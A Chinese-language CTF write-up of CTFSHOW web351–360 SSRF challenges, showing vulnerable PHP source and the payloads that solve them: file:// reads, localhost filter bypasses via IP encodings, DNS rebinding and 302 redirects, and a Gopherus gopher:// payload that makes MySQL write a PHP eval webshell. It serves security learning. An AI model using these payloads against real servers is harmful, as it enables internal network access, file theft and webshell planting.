SSRF学习

文章目录

基础知识

ssrf漏洞,全称为服务端请求伪造漏洞,由于有的web应用需要实现从其它服务器上获取资源的功能,但是没有对url进行限制,导致可以构造非本意的url对内网或者其它服务器发起恶意请求。

ssrf漏洞的危害可以通过ssrf漏洞可以对内网或本地机器进行主机发现服务版本探测或者针对内网或本地一些薄弱的应用进行攻击,同时利用ssrf漏洞还可以时服务器主动发起请求,从而做为一个攻击跳板或者绕过CDN找到其服务器的真实ip

file_get_contents(),fsockopen(),curl_exec()三个函数使用不当时将会造成ssrf

实例

初始化一个新的cURL会话并获取一个网页

<?php
// 创建一个新cURL资源
$ch = curl_init();

// 设置URL和相应的选项
curl_setopt($ch, CURLOPT_URL, "http://www.baidu.com/");
curl_setopt($ch, CURLOPT_HEADER, 0);

// 抓取URL并把它传递给浏览器
curl_exec($ch);

// 关闭cURL资源,并且释放系统资源
curl_close($ch);
?>

SSRF学习

CTFSHOW-web351

源码

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?> 

post传参

url=127.0.0.1/flag.php
url=file:///var/www/html/flag.php

CTFSHOW-web352(ip地址变形)

源码

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

使用不同进制的url绕过,ip地址进制转换

url=http://0x7f000001/flag.php

更多姿势

十六进制
url=http://0x7F.0.0.1/flag.php
八进制
url=http://0177.0.0.1/flag.php
10 进制整数格式
url=http://2130706433/flag.php
16 进制整数格式,还是上面那个网站转换记得前缀0x
url=http://0x7F000001/flag.php
还有一种特殊的省略模式
127.0.0.1写成127.1
用CIDR绕过localhost
url=http://127.127.127.127/flag.php
还有很多方式不想多写了
url=http://0/flag.php
url=http://0.0.0.0/flag.php

CTFSHOW-web353

同上

CTFSHOW-web354

DNS-Rebinding攻击绕过

SSRF学习

# 去`ceye.io`绑定127.0.0.1
url=http://r.a5edel.ceye.io/flag.php

现成的A记录是127.0.0.1的网站

url=http://sudo.cc/flag.php

302跳转绕过,但是我的vps都含有1和0

<?php
header("Location:http://127.0.0.1/flag.php");

CTFSHOW-web355-web356

POST:url=http://0/flag.php

CTFSHOW-web357

vps302跳转

<?php
header("Location:http://127.0.0.1/flag.php");

CTFSHOW-web358

代码

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}


echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?> 

使用@绕过http://ctf.使用#show或者?show绕过最后的show

POST:url=http://ctf.@127.0.0.1/flag.php?show

CTFSHOW-web359(SSRF打mysql)

使用Gopherus生成payload

py -2 .\gopherus.py --exploit mysql

Give MySQL username: root
Give query to execute: select '<?php eval($_REQUEST[pass]);?>' INTO OUTFILE '/var/www/html/pass.php';

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4f%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%52%45%51%55%45%53%54%5b%70%61%73%73%5d%29%3b%3f%3e%27%20%49%4e%54%4f%20%4f%55%54%46%49%4c%45%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%70%61%73%73%2e%70%68%70%27%3b%01%00%00%00%01

SSRF学习
注意:还要将生成的payload url编码一下

gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254f%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2552%2545%2551%2555%2545%2553%2554%255b%2570%2561%2573%2573%255d%2529%253b%253f%253e%2527%2520%2549%254e%2554%254f%2520%254f%2555%2554%2546%2549%254c%2545%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2570%2561%2573%2573%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501

CTFSHOW-web360(SSRF打redis)

生成打redis的payloadSSRF学习
需要再url编码一下,生成shell.php,密码为pass

上一篇:逻辑越权


下一篇:SSRF漏洞入门篇